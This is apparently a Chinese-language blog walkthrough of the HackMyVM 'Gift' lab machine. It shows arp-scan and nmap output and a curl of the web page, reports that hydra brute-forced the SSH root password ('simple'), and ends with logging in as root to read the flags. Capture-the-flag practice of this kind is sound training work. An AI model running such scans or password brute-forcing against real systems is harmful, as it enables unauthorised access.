lvzhouhang
0%

HackmyVM-Gift

发表于 分类于
本文字数: 1.4k 阅读时长 ≈ 1 分钟

信息搜集

用arp-scan扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    a4:a9:30:df:ef:44       (Unknown)
192.168.31.200  08:00:27:5f:2f:1e       PCS Systemtechnik GmbH
192.168.31.220  46:3e:62:f9:1e:fa       (Unknown: locally administered)
192.168.31.187  a6:9b:e0:2d:30:9a       (Unknown: locally administered)
192.168.31.217  b4:0f:b3:8e:31:07       vivo Mobile Communication Co., Ltd.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.995 seconds (128.32 hosts/sec). 5 responded

ip地址为192.168.31.200,然后nmap扫描开放的端口

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.200 --min-rate=1000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 00:40 EST
Nmap scan report for gift (192.168.31.200)
Host is up (0.0080s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:5F:2F:1E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.96 seconds

只开启了22和80端口

1
2
3
4
5
┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl http://192.168.31.200/

Dont Overthink. Really, Its simple.
        <!-- Trust me -->

目录扫描也只有一个index.html,80端口没有入口点,只能找22端口,用hydra爆破root密码

1
[22][ssh] host: 192.168.31.200   login: root   password: simple

SSH登录

ssh root@192.168.31.200

能直接查看root.txt和user.txt

总结

Dont Overthink. Really, Its simple.,Easy靶场,hydra直接爆破没什么好说的